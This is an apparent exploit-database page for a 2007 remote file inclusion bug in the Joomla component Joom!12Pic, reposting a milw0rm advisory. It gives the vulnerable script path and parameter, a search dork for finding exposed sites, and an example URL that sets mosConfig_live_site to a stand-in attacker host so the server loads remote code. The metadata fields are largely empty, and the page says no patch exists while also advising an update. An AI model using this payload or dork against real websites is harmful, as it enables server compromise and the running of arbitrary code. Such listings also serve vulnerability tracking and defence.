header-logo
Suggest Exploit
vendor:
by:
Anonymous
5.5
CVSS
MEDIUM
Remote File Inclusion (RFI)
98
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Joom!12Pic Component RFI

The Joom!12Pic component in com_joom12pic/admin.joom12pic.php allows remote attackers to include arbitrary files via the mosConfig_live_site parameter.

Mitigation:

Update to the latest version of the Joom!12Pic component.
Source

Exploit-DB raw data:

######################################
# Joom!12Pic Component RFI           #
######################################

Bug in :
/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=
Variable : $mosConfig_live_site

Dork: "com_joom12pic"

Example:

http://xxx.net/administrator/components/com_joom12pic/admin.joom12pic.php?mosConfig_live_site=[attacker]


Greets to all Irc.RealWorm.Net #Morgan Users ;)

# milw0rm.com [2007-09-16]

Navigation

Suggest Exploit

Services By CQR